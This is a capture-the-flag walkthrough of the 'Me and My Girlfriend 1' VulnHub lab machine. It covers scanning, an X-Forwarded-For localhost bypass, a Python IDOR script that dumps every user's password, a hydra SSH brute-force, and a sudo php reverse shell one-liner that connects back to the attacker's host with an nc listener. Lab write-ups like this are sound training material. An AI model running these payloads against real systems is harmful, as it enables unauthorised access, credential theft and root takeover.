Target machine notes: Me and My Girlfriend 1

Target description

Description: This VM tells us that there are a couple of lovers namely Alice and Bob, where the couple was originally very romantic, but since Alice worked at a private company, "Ceban Corp", something has changed from Alice's attitude towards Bob like something is "hidden", and Bob asks for your help to get what Alice is hiding and get full access to the company!

Difficulty Level: Beginner

Notes: there are 2 flag files

Learning: Web Application | Simple Privilege Escalation

Target link

https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/

Testing the target

Information gathering

Locating the target with fscan
.\fscan64.exe -h 192.168.1.0/24
start infoscan
(icmp) Target 192.168.1.53    is alive
(icmp) Target 192.168.1.105   is alive
(icmp) Target 192.168.1.103   is alive
(icmp) Target 192.168.1.1     is alive
[*] Icmp alive hosts len is: 4
192.168.1.103:80 open
192.168.1.105:139 open
192.168.1.53:22 open
192.168.1.105:135 open
192.168.1.105:443 open
192.168.1.1:80 open
192.168.1.103:22 open
192.168.1.105:3306 open
192.168.1.105:445 open
192.168.1.105:7000 open
192.168.1.105:8000 open
192.168.1.105:7680 open

The target is 192.168.1.103 (only ports 22 and 80 are open on it; 192.168.1.53 is the attacking host).

nmap scan
$ nmap -sT -sV -A 192.168.1.103 -oA me

Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-08 17:34 CST
Nmap scan report for 192.168.1.103
Host is up (0.00034s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 57:e1:56:58:46:04:33:56:3d:c3:4b:a7:93:ee:23:16 (DSA)
|   2048 3b:26:4d:e4:a0:3b:f8:75:d9:6e:15:55:82:8c:71:97 (RSA)
|   256 8f:48:97:9b:55:11:5b:f1:6c:1d:b3:4a:bc:36:bd:b0 (ECDSA)
|_  256 d0:c3:02:a1:c4:c2:a8:ac:3b:84:ae:8f:e5:79:66:76 (ED25519)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.64 seconds
zsh: segmentation fault  nmap -sT -sV -A 192.168.1.103 -oA me
                                                             
Directory scan
$ gobuster dir -u http://192.168.1.103/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.1.103/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2023/01/08 17:37:04 Starting gobuster in directory enumeration mode
===============================================================
/misc                 (Status: 301) [Size: 312] [--> http://192.168.1.103/misc/]
/config               (Status: 301) [Size: 314] [--> http://192.168.1.103/config/]
/server-status        (Status: 403) [Size: 293]                                   
Progress: 180146 / 220561 (81.68%)                                               ^C
[!] Keyboard interrupt detected, terminating.
                                                                                  
===============================================================
2023/01/08 17:37:24 Finished

Bypassing the local-access restriction

Visiting the homepage shows that access is restricted: the site only serves requests that appear to come from localhost.

Adding an X-Forwarded-For: 127.0.0.1 header (here with a browser extension that injects the header) bypasses the check: the application takes the client address from that header, which the client fully controls, instead of from the TCP connection.
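The check the site performs is the classic mistake of deriving the client address from a header the client controls. As an added illustration (this is not the target's PHP, which the writeup does not show), here is the same decision in Python: a naive version that is bypassed exactly as above, beside a hardened version that only honours X-Forwarded-For when the TCP peer is a known reverse proxy, and even then uses the hop that proxy appended rather than the first value. The addresses and the trusted proxy 10.0.0.2 are assumptions made up for the example.

```python
LOCAL_ADDRS = frozenset({"127.0.0.1", "::1"})


def _header(headers, name):
    """Case-insensitive header lookup (HTTP header names are case-insensitive)."""
    for k, v in headers.items():
        if k.lower() == name.lower():
            return v
    return None


def client_ip_naive(headers, remote_addr):
    """Vulnerable: believes X-Forwarded-For, which any client can set to 127.0.0.1."""
    xff = _header(headers, "X-Forwarded-For")
    if xff:
        return xff.split(",")[0].strip()
    return remote_addr


def client_ip_hardened(headers, remote_addr, trusted_proxies=frozenset()):
    """Only honour X-Forwarded-For when the direct TCP peer is a trusted reverse proxy,
    and then use the address that proxy appended (the last hop), not the first value,
    which the original client is free to forge."""
    if remote_addr not in trusted_proxies:
        return remote_addr
    xff = _header(headers, "X-Forwarded-For") or ""
    hops = [h.strip() for h in xff.split(",") if h.strip()]
    return hops[-1] if hops else remote_addr


def is_local_request(headers, remote_addr, hardened=True, trusted_proxies=frozenset()):
    """The access-control decision the site makes: allow only localhost clients."""
    if hardened:
        ip = client_ip_hardened(headers, remote_addr, trusted_proxies)
    else:
        ip = client_ip_naive(headers, remote_addr)
    return ip in LOCAL_ADDRS


if __name__ == "__main__":
    # Constructed request: the attacker at 192.168.1.53 sends the spoofed header, as in the bypass above
    spoofed = {"X-Forwarded-For": "127.0.0.1"}
    print("naive    :", is_local_request(spoofed, "192.168.1.53", hardened=False))  # True (bypassed)
    print("hardened :", is_local_request(spoofed, "192.168.1.53"))                  # False
    # Behind an assumed trusted proxy 10.0.0.2 that appended the real client address
    via_proxy = {"X-Forwarded-For": "127.0.0.1, 192.168.1.53"}
    print("via proxy:", is_local_request(via_proxy, "10.0.0.2", trusted_proxies={"10.0.0.2"}))  # False
```

The hardened variant still fails if the trusted-proxy list is wrong or the proxy does not overwrite a client-supplied header, so the safest fix for a site that really must be local-only is to bind the listener to 127.0.0.1 and ignore the header entirely.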

Horizontal privilege escalation (IDOR)

The site has login and registration pages; register a user and log in.

Open the profile page and view the page source: the password is present in clear text in the value attribute of the password input.

Change the user_id parameter to see whether other users' passwords are exposed the same way.

Setting user_id=1 returns the account and password of user 1: the profile page never checks that the requested id belongs to the logged-in session.

Run a script to dump every user's credentials and save them:

import re
import requests

BASE = "http://192.168.1.103"
# X-Forwarded-For must accompany every request or the site refuses non-local clients
HEADERS = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36",
           "X-Forwarded-For": "127.0.0.1"}
# session cookie of the account registered above; the profile page needs a logged-in user
COOKIES = {"PHPSESSID": "7mk2k1p77qr6t1gf9ba25k6hp5"}
# the profile form carries name, username and password as <input> values
PATTERNS = {"name": r'id="name"\s+value="(.*?)"',
            "username": r'username"\s+value="(.*?)"',
            "password": r'password"\s+value="(.*?)"'}

def get_user_info(user_id):
    """Fetch the profile of user_id; return its fields, or None if the page lacks them."""
    url = f"{BASE}/index.php?page=profile&user_id={user_id}"
    html = requests.get(url, headers=HEADERS, cookies=COOKIES, timeout=10).text
    fields = {}
    for key, pattern in PATTERNS.items():
        m = re.search(pattern, html)
        if m is None:  # unknown user_id or unexpected layout: skip instead of crashing
            return None
        fields[key] = m.group(1)
    return fields

for i in range(15):
    info = get_user_info(i)
    if info and info["name"]:
        print(info["username"] + ":" + info["password"])  # one login:password per line for hydra -C

Brute-forcing SSH with hydra

Save the dumped pairs to a file (userinfo) and hand it to hydra. -C takes a colon-separated login:password file and tries each pair only against itself, so this tests exactly the leaked credential set instead of a full login/password cross product:
hydra -C userinfo ssh://192.168.1.103
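To make the two previous steps reproducible offline, here is an added example (not the author's script above and not the target's code) that parses a profile page the way the IDOR dump relies on, using Python's html.parser instead of regular expressions so that attribute order and spacing do not matter, and renders the result as the login:password lines hydra -C consumes. The sample HTML is constructed for the example and is not a capture from the VM.

```python
from html.parser import HTMLParser


class ProfileFormParser(HTMLParser):
    """Collect <input> values keyed by id (falling back to name)."""

    def __init__(self):
        super().__init__()
        self.fields = {}

    def handle_starttag(self, tag, attrs):
        if tag != "input":
            return
        a = dict(attrs)
        key = a.get("id") or a.get("name")
        if key and "value" in a:
            self.fields[key] = a["value"] or ""


def parse_profile(html):
    """Return the input fields of a profile page as a dict, e.g. {'username': ..., 'password': ...}."""
    p = ProfileFormParser()
    p.feed(html)
    p.close()
    return p.fields


def credentials(fields):
    """Username/password pair from a parsed profile, or None when the id had no account."""
    user, pw = fields.get("username"), fields.get("password")
    if user and pw:
        return user, pw
    return None


def hydra_combo_lines(pairs):
    """Render pairs as the colon-separated login:password lines hydra -C expects.
    Duplicates are dropped; a login containing ':' cannot be represented and is skipped."""
    lines, seen = [], set()
    for user, pw in pairs:
        if ":" in user or (user, pw) in seen:
            continue
        seen.add((user, pw))
        lines.append(f"{user}:{pw}")
    return "\n".join(lines) + ("\n" if lines else "")


# Constructed sample pages (not captured from the target): one valid profile and one for a
# user_id that does not exist, which here renders the form with empty values.
SAMPLE_PROFILE = """
<form method="post">
  <input type="text" id="name" name="name" value="Example User">
  <input type="text" id="username" name="username" value="user1">
  <input type="password" id="password" name="password" value="secret1">
  <input type="submit" value="Update">
</form>
"""
SAMPLE_MISSING = """
<form method="post">
  <input type="text" id="name" value="">
  <input type="text" id="username" value="">
  <input type="password" id="password" value="">
</form>
"""


def dump_to_combo(pages):
    """Walk the fetched profile pages (as the enumeration loop would) and build the hydra file body."""
    pairs = [c for c in (credentials(parse_profile(h)) for h in pages) if c]
    return hydra_combo_lines(pairs)


if __name__ == "__main__":
    body = dump_to_combo([SAMPLE_MISSING, SAMPLE_PROFILE, SAMPLE_PROFILE])
    with open("userinfo", "w") as fh:  # the file passed to `hydra -C userinfo ssh://...`
        fh.write(body)
    print(body, end="")
```

In practice the pages list would be the responses of the user_id loop; everything else stays the same, and the file written is exactly what the hydra command above reads.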

Log in over SSH with the credentials hydra confirms and read flag1.txt.

Privilege escalation

Check the current user's sudo rights

sudo -l

php may be run through sudo without a password.

PHP reverse shell

On the attacking host (192.168.1.53) start a listener, then on the target run php through sudo so that it connects back:
nc -lnvp 9001
sudo php -r '$sock=fsockopen("192.168.1.53",9001);exec("/bin/bash -i <&3 >&3 2>&3");'

The payload assumes the socket lands on file descriptor 3, the first free descriptor after stdin, stdout and stderr; if nothing connects back, try 4, 5 or 6 in the redirections. Because sudo runs php as root, the shell that comes back is a root shell.
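Reading sudo -l by hand is fine on one box; when the check is repeated often it pays to parse the output. The following is an added example (not from the writeup) that parses the rule lines sudo -l prints and flags NOPASSWD entries whose binary is an interpreter or shell, which is exactly the php entry abused above. The sample output, the user name alice and the hostname "target" are constructed for the example.

```python
import re
import shlex

# Binaries that hand out a shell trivially when allowed via sudo (interpreters, shells, editors);
# the php entry found on this machine is one of them.
SHELL_CAPABLE = frozenset({
    "php", "python", "python2", "python3", "perl", "ruby", "node", "lua",
    "bash", "sh", "dash", "zsh", "vi", "vim", "nano", "less", "more",
    "find", "awk", "env", "man",
})

# One sudoers rule as printed by sudo -l:  (runas) TAG: TAG: /path/cmd args, /path/other
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")


def parse_sudo_l(output):
    """Parse the 'may run the following commands' section of sudo -l into rule dicts."""
    rules, in_rules = [], False
    for line in output.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules or not line.strip():
            continue
        m = RULE_RE.match(line)
        if m is None:
            continue
        tags = {t.strip() for t in m.group("tags").split(":") if t.strip()}
        for cmd in m.group("cmds").split(","):  # several commands may share one line
            cmd = cmd.strip()
            if cmd:
                rules.append({"runas": m.group("runas").strip(), "tags": tags, "command": cmd})
    return rules


def binary_name(command):
    """Basename of the executable in a sudoers command spec ('ALL' stays 'ALL')."""
    parts = shlex.split(command)
    return parts[0].rsplit("/", 1)[-1] if parts else ""


def nopasswd_shell_vectors(rules):
    """Rules that need no password and run a shell-capable binary (or ALL) as another user."""
    return [r for r in rules
            if "NOPASSWD" in r["tags"]
            and (r["command"] == "ALL" or binary_name(r["command"]) in SHELL_CAPABLE)]


# Constructed sudo -l output modelled on what this machine shows (php allowed without a password).
SAMPLE_SUDO_L = """\
Matching Defaults entries for alice on target:
    env_reset, mail_badpass

User alice may run the following commands on target:
    (root) NOPASSWD: /usr/bin/php
    (root) /usr/bin/apt-get update, /usr/bin/apt-get upgrade
"""


if __name__ == "__main__":
    for r in nopasswd_shell_vectors(parse_sudo_l(SAMPLE_SUDO_L)):
        print(f"sudo -u {r['runas']} {r['command']}  # runs without a password")
```

Feed it the real output (for example `parse_sudo_l(subprocess.run(["sudo", "-n", "-l"], capture_output=True, text=True).stdout)`) and anything it flags deserves a look at the corresponding GTFOBins entry before reaching for a reverse shell.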

With the root shell, read flag2.txt.

Afterwards, missing each other also became the way of the world.

Author: 夜yesec